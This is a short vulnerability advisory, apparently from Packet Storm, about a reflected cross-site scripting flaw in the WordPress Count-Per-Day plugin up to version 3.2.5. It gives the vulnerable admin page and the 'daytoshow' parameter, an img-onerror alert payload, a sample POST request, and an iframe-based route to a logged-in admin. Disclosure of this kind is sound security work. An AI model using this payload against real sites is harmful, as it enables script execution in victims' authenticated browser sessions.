WordPress Count-Per-Day 3.2.5 Cross Site Scripting

2013-03-05T00:00:00
ID PACKETSTORM:120649
Type packetstorm
Reporter alejandr0.m0f0
Modified 2013-03-05T00:00:00

Description

                                        
                                            `#------------------  
# WordPress Count-Per-Day plugin 3.2.5. Type-1 (reflected) Cross Site  
Scripting (XSS)  
#  
# affected versions <= 3.2.5. (tested on 3.2.5, 3.2.3)  
#  
# impact:  
# - code execution in browser context  
#  
# author: alejandr0.m0f0  
  
1/ navigate to the page:  
/wordpress/wp-admin/?page=cpd_metaboxes  
  
2/ bottom of the page: "visitors per day"  
current date is printed (e.g., 2013-03-04)  
replace this field by  
2013-03-04"><img src=x onerror=alert(1)>  
press show.  
  
3/ request is submitted, server reflects the sent value. filter on  
server side is identity, thus pretty easy to exploit.  
the payload gets executed.  
----------  
e.g., of exploitation:  
-------------------  
POST .../wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1  
...  
  
daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show  
-------------------  
# requirements: victim should be authenticated as user having access  
to this plugin (e.g., admin)  
# this is still a practical attack in case e.g. attacker embeds an  
iframe on a website he controls, and assuming the victim is logged in  
wordpress, then the SOP access control is bypassed.  
`